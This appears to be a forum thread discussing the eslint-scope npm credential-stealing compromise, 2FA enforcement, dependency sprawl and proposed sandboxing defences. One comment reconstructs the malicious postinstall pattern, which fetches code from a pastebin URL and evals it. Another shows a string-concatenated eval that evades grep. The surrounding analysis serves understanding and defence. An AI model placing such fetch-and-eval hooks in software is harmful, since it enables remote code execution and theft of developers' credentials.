I like to think I hold myself and people in our own industry to higher standards than the Internet at large.
I, too, greatly dislike the cruelty of public shaming. It's inhumane, and dehumanizes us all.
Recently I was tasked with improving 2FA usage in my company's GitHub organization. My first approach was to nicely, neatly, and personably ask people, coupled with regular announcements to make sure everyone knew. Every interaction came with documentation on how to do it and a sincere offer to walk them through it. Totally reasonable approach, executed with kindness and compassion.
The cynic in me was unsurprised when this rapidly became a Sisyphean task. A number of people, upon being informed in half a dozen different ways, professed to have no idea that they were expected to enable 2FA. Others swore up and down to me that they knew what to do and would shortly enable it, only for it to still be off a week or more later.
At this point I decided that kindness and human compassion were a drain on my time and clearly ineffectual. So I grabbed a junior engineer and we wrote a script that automatically removes from the org anyone who doesn't have 2FA enabled. Announced it to everyone, every manager on board, and turned it on. Overnight, the problem went away, and has largely stayed away. Once in a while people publicly ask why they were kicked out and are reminded that they were informed of the 2FA requirement.
This isn't an approach characterized by humanity and kindness. It is, however, one that is effective and time-efficient.
You're absolutely right! GitHub does offer that wonderful feature.
There are some legacy bot accounts that we cannot readily transition to 2FA and cannot do without. The feature you have so rightly pointed to would evict them from the org. That's not an acceptable outcome in this case.
I skipped over this in my previous comment because I felt it wasn't germane to the story or the point.
I hope you also publicly shame services that only offer 2FA in exchange for your phone number.
My phone number identifies me much better than my email address and/or cookies ever will. As someone who cares about privacy, I don't give it to anyone. And yet, publicly shaming me for not enabling 2FA would shame me by proxy for caring about privacy.
Security > Privacy, and there are plenty of ways to get static burner phone numbers for a small fee if privacy is that important to you. (Skype, Google Voice, Burner Phone, etc)
I think it would be interesting - one solution could be a loader (ESM) that only lets you load other "unprivileged" files by default - then importing things like `child_process` or `fs` could require more privilege. A little like how apps work.
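A rough sketch of what such a loader could look like, using Node's experimental loader hooks (API circa Node 10 and subject to change; the privilege policy here is entirely made up):

// privileged-loader.mjs -- hypothetical policy, not a finished design
const PRIVILEGED = new Set(['fs', 'child_process', 'net', 'https']);

export function resolve(specifier, parentModuleURL, defaultResolve) {
  if (PRIVILEGED.has(specifier)) {
    // a real design would consult a whitelist instead of always throwing
    throw new Error(`importing "${specifier}" requires elevated privilege`);
  }
  return defaultResolve(specifier, parentModuleURL);
}

// usage: node --experimental-modules --loader ./privileged-loader.mjs app.mjs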
> A programmatic way to tell if the publisher of a module has 2FA enabled.
I will bring this up. Personally I think I understand the objection of the reply below about this information being risky. That's something NPM likely can/should solve and not Node.js.
For what it's worth GitHub orgs can already tell who has or doesn't have 2FA. Node.js itself for example enforces GitHub 2FA for all the organization. I assume GitLab has a similar feature.
Not a solution for everything, but one of the key reasons we made RunKit is precisely to allow you to try random packages without giving them access to your computer (it's basically an easy way of doing the "run everything in a Docker container" suggestion below). NPM links directly to this where it says "try <package> in your browser", but you can also just do it yourself: https://runkit.com/new.
I can't imagine most modules need to read or write your .npmrc directly (npm itself does). That should flag a module (with the understanding that I'm sure some modules do legitimately need that access - e.g. to easily swap which registry you're publishing to).
When a dependency tree starts going too deep, it's too easy for malicious modules to get snuck in. You pull in Popular Library X which depends on well-known module A, which in turn pulls in shim B, which in turn depends on an unpinned utility C. Somebody sneaks a malicious hook into utility C which isn't used directly by anybody really, but propagates the malicious code to all the users of Popular Library X (eg Babel).
How about something like OpenBSD's pledge(2) system call [0] for Node?
First: everyone decide on a set of potentially dangerous things for a program to do. Three examples off the top of my head: disk I/O, accessing the network, executing external programs.
A function could declare that it will only do some subset of potentially-dangerous operations, and an exception will be thrown if either it or anything further down the call stack does any of the others.
In this particular case it seemed to be some post-install build script that caused it - but if this was present in the Node core would it be that difficult to implement in npm (i.e. "my post-install script and its dependencies will only ever do disk I/O")?
If this is possible, and if it was adopted in the community widely enough, this would halt the imminent "some thing I depended on depended on something else that depended on a string function that turned into a credentials hoover" apocalypse...
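A hypothetical sketch of what such an API could feel like in Node (process.pledge does not exist; all names here are made up):

// modeled on OpenBSD's pledge(2): declare up front what you'll ever do
process.pledge(['fs']); // this script promises to only do disk I/O

const fs = require('fs');
fs.writeFileSync('/tmp/ok.txt', 'fine'); // allowed: disk I/O was pledged

const https = require('https');
https.get('https://example.com/');       // would throw: network was never pledged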
Can someone instead make a utility that, assuming my project's packages only ever get upgraded, not downgraded, checks whether they could have been compromised or included compromised code? We could then check each of our projects. If you do downgrade packages, you'd have to run it on prior commits as well.
I would shame an adult who keeps making mistakes that are massively impactful on many others. Given npm's scope within the tech world, there's no way they can be fairly described as a "child". They're a hugely significant entity, and need to act like it.
I think someone needs to audit all versions of all packages on npm. The original eslint maintainer's credentials could have been compromised days ago, via an older version of another module; then the credential stealing code could have been removed in a more recent update.
I've grepped my entire local code base for 'eval' and 'pastebin'; I seem to be fine. But was I fine yesterday? The "^" wildcard is just evil.
And the fallout from this could be incredibly complex. What do you think the original hackers will do with the stolen npm credentials? The paranoid side of me says they are inserting different hacks in any module they can.
> I've grepped my entire local code base for 'eval' and 'pastebin'; I seem to be fine.
I don't know if I'm missing something, but couldn't they have easily called it indirectly like this: console.log(global["ev" + "al"]("40 + 2")); I tested it here: http://rextester.com/FEPVG53848
I think developers need to be much more deliberate about the packages they use and try to have a very small node_modules where it's possible to provide some oversight.
This is not possible under the npm/js paradigm of massive module dependency trees. You'll get a module that has 10 dependencies, and each of those 10 dependencies will have 5 dependencies of their own, and somewhere at the fourth level sits an infected eslint package.
Right! That's what I thought: this is left-pad all over again.
Although left-pad was really just a disgruntled publisher... this involves a malicious third party.
My suggestion for fixing the latter would be to enforce 2FA for publishing packages that have this many dependents.
Award a badge to a release when it is published with 2FA. LTS releases could then be verified as manually published. This would factor into package consumers' decision-making on whether or not to include a dependency in their package.json.
The node package ecosystem is not "designed" to work this way. Everybody is encouraged to use many single purpose packages. The production app I work on at work has over 1000 dependencies. Almost all of them are transitive. (We have maybe 20-30 specified dependencies.)
It's possible to use NPM that way too, I don't think it's "designed" to work in any specific way it just installs what you tell it to.
It's important to be pragmatic about blindly-installed and unreviewed 3rd-party code that can read our ENV.
Those 20 - 30 modules you like could probably each achieve a significant reduction in their dependencies and you probably could too by exploring their alternatives.
The culture of the Node.js ecosystem is to split things into many small packages, so there are no alternative dependencies that themselves have fewer dependencies. (This is drastically different from ecosystems like Go, where dependencies are practically discouraged.) We try to avoid using obscure packages anyway, so even if there were, we'd be choosing between a popular and well-tested package and one that is less popular and less tested but has fewer dependencies. That is probably not a tradeoff we'd be willing to make without a lot of trust in the less popular package.
I have never seen NodeJS (or any other) developers advocating to blindly include third-party code in their applications. I think what you are describing is just a side-effect of not considering the ramifications which only works until NPM (or any package manager) starts being exploited.
At least in my experience it's surprisingly difficult to find alternative packages that don't rely on all sorts of (often gratuitous) other dependencies.
It's a mess, I wish I didn't have to associate with the whole ecosystem. I much prefer package managers where you specify an explicit version that you depend on, and have to handle updates yourself - people tell me npm does this now, but I haven't yet seen it work the way I expect it ought to.
Of course that kind of a scheme is much more manageable when dependencies are fewer, chunkier, and slower moving. NPM-land, where running npm install downloads half of the internet for a little web page project, is too far gone beyond the pale.
It's part of the ESLint organization, which is what I'm referring to being compromised, not the exact package.
What you're saying is wrong anyhow, as far as I can see. eslint-scope is included by ESLint. The current version uses ^4.0.0 and shouldn't be affected, but versions from before May have the affected ^3.7.1 dependency.
This version is also included in webpack, making it a big target anyway.
I always thought it was a little weird for credentials to be put into .npmrc, and this isn't the first time this has caused a problem. Lots of people host their dotfiles publicly, but if you do that with .npmrc you'll (eventually) get an admonishing email from github etc. It really conflicts with the (correct, again) Unix model of separating configuration data from ephemeral data. The creds should be placed in $XDG_CACHE_HOME/npm/ , a directory that already contains lots of ephemeral data for npm. Incidentally that directory and its subdirectories seem to be world-readable by default, which is also stupid.
npm has revoked all access tokens issued before 2018-07-12 12:30 UTC.
If credentials were configuration, we'd be screwed now, because the data we have stored is no longer valid. Fortunately, all we have to do is this:
$ npm adduser
Now the data we have stored is correct again! This is textbook ephemeral data. We can cache it, and that might save some time, but it really doesn't matter. We could flush cache every half hour and it wouldn't hurt a thing.
Another way to see that credentials aren't configuration is what I suggested above: we would never want to back up or publish them, so they are different from and belong in a different place than configuration that we definitely want to back up and often want to publish.
[EDIT:] If one had only considered this from a "12-factor" perspective, in which creds and config are both called config and are both stored in envvars, I could understand the confusion. Note however that the config we're talking about for npm is e.g. "init-author-email". That doesn't change from environment to environment, so it's more like what 12-factor would call code...
This would be a good time to stop what you are doing right now and enable 2FA everywhere you can think of if you haven’t already.
If you control an organisation account enforce it for everyone (github, etc).
I know some places implement it poorly (I'm looking at you, SMS-based 2FA), but it's getting to the point where not having it enabled makes it a question of when, not if, you will be compromised. This and Gentoo are recent examples that could have been prevented by 2FA that was available but not enabled.
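For what it's worth, the npm CLI itself has offered 2FA since late 2017; the "auth-and-writes" mode also demands an OTP for every publish:

npm profile enable-2fa auth-and-writes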
Not that it’s a bad idea in general, but I don’t think it would help in this situation. I’ve never published NPM packages, but I’m assuming that it only asks for a 2FA token when you first log in, and not every time you publish. Because this thing is stealing local tokens, I think 2FA wouldn’t help.
Possibly not, but it would have prevented the compromise in the first place. My advice was less about helping people affected by this and more about trying to prevent the next one.
I have to wonder if using the same approach as Packagist would be better. In order to upload to Packagist you have to link your git repo (GitHub, Bitbucket, etc.) to your Packagist account and sync it that way. The thing npm got wrong here is that you can upload without doing any of that. It seems like that simple step would have prevented this, if I'm understanding the chain of events correctly.
I don't know, it seems like your SSH key could've been compromised the same way the npm publish token was obtained. So that would only protect those that do not use SSH (or GitHub, which luckily isn't required to publish an npm package) to push.
Perhaps. Though I'd guess the statistical odds of an SSH key being breached are smaller than those of web credentials being stolen, though I could be wrong; my background is not in security. Just anecdotally, I haven't met anyone who has had their SSH keys hacked/stolen/compromised, but I know lots and lots of people, even smart people who use 2FA for everything, who have had something compromised. (Though I can vividly remember one case where 2FA saved the day when a co-worker of mine had a very nasty identity theft problem. Remember folks, don't ever save a note in your email with your SSN and driver's license.)
Sure, this is true. Though for the audience of folks who (1) know what an SSH key is and (2) know how to generate one, I'd put better-than-average odds on the SSH key not being the thing that's compromised, versus any internet account, particularly one without 2FA enabled.
This is why your SSH key has no business being in the filesystem and should instead be on a hardware token where all the crypto/signing operations happen on the HW token's chip.
> Are they able to hijack stuff all the way down the dependency chain?
Potentially.
Just because you have `eslint` installed as a dependency doesn't mean this exploit ran on your computer. You would have had to run `npm install` (or a similar command) during the infected time (NPM makes it sound like just a few hours).
Details:
This was in `eslint-scope`, an optional dependency of `eslint`.
For this to affect you, you would have needed to run an `npm install`-like command after the infected version of the module was published to `npm` and before it was unpublished.
It's not clear yet if any other modules were infected. Time may tell.
The exploit ran arbitrary code (RCE) after an `npm install` / `npm update` type of command. The payload was fetched from a pastebin paste (since neutralized), so the author could change what the RCE did at any time just by editing the paste; see the sketch after this list.
NPM has announced that they have disabled the credential tokens issued during a specific time interval, meaning that NPM publishers will have to re-authenticate in order to publish module updates.
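For context, the pattern appears to have been roughly the following (a reconstruction based on the paste above, not the literal attack code; file names are illustrative):

// hypothetical reconstruction of the fetch-and-eval pattern
// package.json would declare something like:
//   "scripts": { "postinstall": "node ./build.js" }
var https = require('https');
https.get('https://pastebin.com/raw/XLeVP82h', function (res) {
  var body = '';
  res.on('data', function (chunk) { body += chunk; });
  res.on('end', function () {
    try { eval(body); } catch (e) {} // whatever the paste contains runs here
  });
}).on('error', function () {});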
Is it possible that this is an npm virus, or a semi-automated chain of compromises, and that the eslint-scope project's npm credentials were compromised the same way? Given it was eval-ing code off pastebin, it's hard to tell what has been going on.
They say the package didn't come from their pipeline, so it's most likely published with stolen credentials. So it's not far-fetched to think those credentials were stolen the same way. More packages may be affected.
They did say the pastebin has been taken down, so at least it won't spread further. Still, everybody who ever publishes anything should reset their credentials.
It won't spread further... for this specific package. There's nothing to prove the virus isn't self-replicating, using a different pastebin/source or mechanism to infect all packages of authors whose credentials were compromised, and then the authors who install packages that depend on those packages, and so on. If the publishing credentials of other package authors have been compromised, the scope could be nearly the entire npm ecosystem.
npm should require all package maintainers to set up 2-Factor Authentication (NOT via sms) and reauthenticate on every update, effective immediately. That's the only fix I can see for this. Libraries are too vulnerable and our current js ecosystem has too many dependencies and too many people in the chain to trust that all of them use secure password practices and none of them have been compromised.
It seems language package manager compromise is becoming an increasingly prevalent attack vector.
IMHO, at some point, the software development industry is going to have to come together and find a way to collectively audit the most widely used packages, considering that the status quo of everyone doing their own auditing is clearly not working. Perhaps a twitter-style 'blue tick' or similar for audited libraries.
Unfortunately in this case, since the source repository itself wasn't compromised, there was nothing to audit (assuming the final bundle was packed/minified).
One interesting mitigation would be for NPM to allow you to bind your package directly to a particular repo. So rather than a user (or job system) manually publishing releases, NPM could ensure that what's live always matches what's in the repo.
I've always wondered, how does apt-get solve this? Do they audit every package?
Yeah, `npm publish` should just – on npm's servers – fetch a GitHub repo and run a build command. This would be more secure, more convenient, and less prone to silly errors (like forgetting to build before releasing).
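The binding half already exists in package.json; the enforcement half is the hypothetical part (npm treats `repository` as purely informational today):

{
  "name": "some-package",
  "repository": { "type": "git", "url": "https://github.com/owner/repo.git" },
  "scripts": { "build": "node build.js" }
}

npm's servers could clone the declared repo at the tagged commit, run the declared build, and reject any uploaded tarball that doesn't match the result.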
> IMHO, at some point, the software development industry is going to have to come together and find a way to collectively audit the most widely used packages
That will never work. Widespread auditing practices will never solve such problems. What the software development industry should do is move towards capability-secure languages where such attacks are virtually impossible.
Due to sandboxing, the concerns for malicious JS are different from those of C. From what I've seen, bad JS usually tries to record/read and then exfiltrate data, which can only be done through a narrow set of native APIs, which would be comparatively easy to check for.
For sandboxed browser apps, I think the exfiltration problem is not much easier - there are a zillion ways a piece of data can get incorporated into an outgoing xhr or image url. And everything can be monkey-patched. And the code will get transpiled, minified and webpacked etc a zillion times over, all steps which are attractive spots to mess with your code.
Also, it's still easy to detect fetch/XHR/img requests that appear out of nowhere and scrutinize them as points of interest. No matter how much your code is obfuscated and minimized, it still has to go through those APIs. There's no way around that.
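As a rough sketch of what that checking could look like in Node (a monkey-patch, per the comment above; this only catches the straightforward cases and is trivially defeated by determined code):

// log every outgoing https request so unexpected destinations stand out;
// https.get funnels through https.request, so one patch covers both
var https = require('https');
var origRequest = https.request;
https.request = function () {
  var opts = arguments[0];
  var host = typeof opts === 'string' ? opts : (opts.hostname || opts.host);
  console.warn('outgoing https request to:', host);
  return origRequest.apply(this, arguments);
};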
Actually, there is the familiar bestiary of side-channels available (e.g. timing, traffic modulation), along with web-specific ones (cookies, DNS, non-HTTP protocols such as WebRTC, etc).
Also, fields in XHR payloads are frequently not human-readable.
Even discounting the above, scrutinizing XHR payloads with a suspicious eye is labour-intensive expert work. It happens once in a blue moon in security audits, and has a fairly low detection rate given the amount of inherently malware-like behaviour most commercial web apps incorporate (e.g. img tags used to carry tracker payloads are routine behaviour from Google and Facebook, and iframes are used to embed terrible things).
Maybe sandbox is the wrong technical term, but JS as a language runs with constraints: mainly, it can't manipulate raw pointers. As far as I know there's no such thing as a buffer-overflow attack in the context of Node.js.
If the malicious JS code is already running in node, there is no need to exploit a RCE bug.
edit: to expand, an underhanded js bug might be a path traversal bug, xss bug, leak of session cookies - any of the familiar js security bugs that occur as honest mistakes too.
(But while on the subject, Node APIs are historically quite unsafe and do have lots of memory-safety vulns; search results are in the three digits in the issue tracker for queries like "segfault". Node APIs are not really written with hostile code in mind.)
This is why I do all of my development in VMs now. I can't abandon Node, because that's the current trend in web development, so I just try to avoid the most common viruses, i.e. the ones that don't include a VM-breakout zero day.
According to the thread, as of about 30 minutes ago the malicious version has been unpublished.
Despite this, it seems that a lot of high-profile packages were vulnerable to an automatic minimum-version bump (e.g. `^` ranges pulling the new release on the next install). There have been quite a few close calls with npm packages, and at some point I feel like one of these will actually do some damage.
The indirect dependencies thing is a real problem, for other reasons too, because you can't control those. The peer dependency system partially solves this, but it's still an issue.
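One practical mitigation for the floating-version problem (assuming npm 5.7+; older setups can use shrinkwrap) is to commit a lockfile and install strictly from it, so transitive versions can't silently jump to a freshly published release:

$ npm ci          # installs exactly what package-lock.json records
$ npm shrinkwrap  # older alternative: freeze the full dependency tree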
Note that NPM claims they already disabled NPM access tokens that were used during the timeframe they assigned to this incident so if you were affected, your token was already revoked.
Also, ESLint's postmortem[1] suggests this was password reuse (creds matching those from a previously popped service) plus lack of 2FA. In short, a failure of a developer with publish permissions to practice basic security hygiene.
Why go through the effort of evalin' the result of pastebin.com/raw/XLeVP82h? Why not just put the resulting code from pastebin directly into the suspicious file?
Probably the most reasonable stopgap for this class of attacks is for npm to do more to encourage 2FA, with badges etc., and to introduce a warning on installs of non-2FA packages.
One of the notes on the ESLint postmortem[1] was that developers shouldn't reuse passwords and should use a password manager to make that easier.
While I ack that 2FA would have prevented this incident, so would have using unique credentials. Note that using unique credentials is available at every SaaS service, not just the ones that support 2FA.
It's not completely resolved until everybody who was potentially compromised audits everything their credentials gave them control over and changes the credentials.
Is a bug not fully resolved until every machine on the planet running that software has upgraded to a version in which the bug doesn't exist? That'd be quite a silly assertion imho.
I mean sure, the turn-around time is great...but how did this pass review in the first place? This should never happen in a reasonably managed project.
It wasn't up for review. It was published out of band, and outside of the ESLint pipeline using likely stolen credentials. That's how that stuff sneaks in.
The CVE DB is usually pretty backlogged. This[1] is the de facto NPM "CVE DB" and describes the two modules[2][3] affected by this incident that ESLint and NPM acknowledge.
Another great reason to not go with gigantic libraries / toolchains / transpilation. Use small code you can read, rather than something like Babel/JSX/React.
The size doesn't matter. Just including a single jQuery-like library from a fake CDN could similarly pwn your supply chain.
If you use other people's code and you don't {statically analyze it, dynamically analyze it, sandbox it and scrutinize its network traffic until you are confident it doesn't phone home, reverse engineer all of the binaries, etc.}, you can get hit by the same issue.
Exactly. Don't use other people's code / depend on their code / services.
But you're wrong about size. It matters. If your code is small enough, you host it yourself rather than relying on external CDNs. Risk surface reduced. And a smaller-code mindset leads to less use of dependencies / bloatware like the React/Babel toolchain, so of course it leads to less risk.
But it also makes fools of a lot of people and conventional/fad wisdom, so I'm unsurprised they're unhappy to hear it.
Why the flagnar do hardcore believers/users of Node insist that everything is fine with their package management, to say nothing of the bad programming practices Node idolizes?
This is what... the 4th major incident in the last 6 months with Node and npm.
Anyone who tells me they use Node will instantly get put in their own sandbox and VLAN. You just can't trust that the code they run is legit, even if they wrote it.